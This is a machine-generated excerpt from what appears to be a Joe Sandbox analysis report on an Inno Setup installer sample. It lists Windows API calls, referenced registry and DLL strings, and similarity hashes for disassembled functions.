                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressByteCharMultiProcWide
                                                    • String ID: SfcIsFileProtected$sfc.dll
                                                    • API String ID: 2508298434-591603554
                                                    • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                    • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                    • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                    • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                    APIs
                                                    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                      • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                      • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                      • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                    • API String ID: 395431579-1506664499
                                                    • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                    • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                    • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                    • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                    Strings
                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                    • PendingFileRenameOperations2, xrefs: 00455A23
                                                    • PendingFileRenameOperations, xrefs: 00455A14
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                    • API String ID: 47109696-2115312317
                                                    • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                    • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                    • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                    • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
                                                    APIs
                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                    • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                    • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 2066263336-0
                                                    • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                    • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                    • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                    • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                    APIs
                                                    • GetMenu.USER32(00000000), ref: 00421359
                                                    • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                    • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                    • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu
                                                    • String ID:
                                                    • API String ID: 3711407533-0
                                                    • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                    • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                    • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                    • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                    APIs
                                                    • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                    • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                    • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Color$CallMessageProcSendTextWindow
                                                    • String ID:
                                                    • API String ID: 601730667-0
                                                    • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                    • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                    • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                    • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                    APIs
                                                    • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                    • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                    • String ID:
                                                    • API String ID: 4071923889-0
                                                    • Opcode ID: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                    • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                    • Opcode Fuzzy Hash: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                    • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                    APIs
                                                    • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                    • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                    • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                    • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A24620A480A570EnumFonts
                                                    • String ID:
                                                    • API String ID: 2630238358-0
                                                    • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                    • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                    • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                    • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                    APIs
                                                      • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                    • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                    Strings
                                                    • EndOffset range exceeded, xrefs: 0045C1ED
                                                    • NumRecs range exceeded, xrefs: 0045C1B6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlush
                                                    • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                    • API String ID: 3593489403-659731555
                                                    • Opcode ID: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                    • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                    • Opcode Fuzzy Hash: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                    • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                    APIs
                                                      • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                      • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                      • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                      • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                      • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                      • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                      • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                      • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                      • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                      • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                      • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                      • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                      • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                      • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                      • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                      • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                      • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                      • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                      • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                      • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                      • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                      • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                    • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                      • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                      • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                      • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                      • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                    • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                      • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                    • String ID: Setup
                                                    • API String ID: 3870281231-3839654196
                                                    • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                    • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                    • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                    • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                    APIs
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: 2H
                                                    • API String ID: 3660427363-1900415311
                                                    • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                    • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                    • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                    • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID: .tmp
                                                    • API String ID: 1375471231-2986845003
                                                    • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                    • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                    • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                    • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                    APIs
                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                    • API String ID: 3535843008-1113070880
                                                    • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                    • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                    • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                    • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: Inno Setup: Setup Version$r_G
                                                    • API String ID: 3702945584-2380526977
                                                    • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                    • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                    • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                    • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                      • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
